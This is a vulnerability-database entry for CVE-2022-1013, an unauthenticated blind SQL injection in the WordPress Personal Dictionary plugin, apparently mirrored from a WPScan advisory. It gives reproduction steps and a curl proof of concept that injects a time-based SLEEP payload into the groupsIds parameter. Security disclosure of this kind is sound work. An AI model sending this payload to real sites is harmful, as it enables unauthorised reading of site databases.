Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitCydaveWPEX-ID:EED70659-9E3E-42A2-B427-56C52E0FBC0D
HistoryApr 18, 2022 - 12:00 a.m.

Personal Dictionary < 1.3.4 - Unauthenticated SQLi

2022-04-1800:00:00
cydave
74

0.016 Low

EPSS

Percentile

87.5%

JSON

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability.

1. Create a new page with the plugin's shortcode (shortcode can be copied from /wp-admin/admin.php?page=personal-dictionary)
2. Visit the page (as admin) with the shortcode and create a new group (any name is fine)
3. Click on the created group and add a new word to it (the word and it's translation don't matter) - then hit save and close
4. Invoke the following curl command to induce a 5 second sleep:

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php' --data 'action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1) AND (SELECT 3892 FROM (SELECT(SLEEP(5)))pFvo)-- P'

Related

prion 1
nvd 1
cve 1
patchstack 1
wpvulndb 1
nuclei 1
cvelist 1
prion
prion
Sql injection
2022-05-09 17:15:00
nvd
nvd
CVE-2022-1013
2022-05-09 17:15:08
cve
cve
CVE-2022-1013
2022-05-09 17:15:08
patchstack
patchstack
WordPress Personal Dictionary plugin <= 1.3.3 - Unauthenticated SQL Injection (SQLi) vulnerability
2022-04-18 00:00:00
wpvulndb
wpvulndb
Personal Dictionary < 1.3.4 - Unauthenticated SQLi
2022-04-18 00:00:00
nuclei
nuclei
WordPress Personal Dictionary <1.3.4 - Blind SQL Injection
2023-03-05 13:42:10
cvelist
cvelist
CVE-2022-1013 Personal Dictionary < 1.3.4 - Unauthenticated SQLi
2022-05-09 16:50:43

0.016 Low

EPSS

Percentile

87.5%

JSON
Related for WPEX-ID:EED70659-9E3E-42A2-B427-56C52E0FBC0D
prion1nvd1cve1patchstack1wpvulndb1nuclei1cvelist1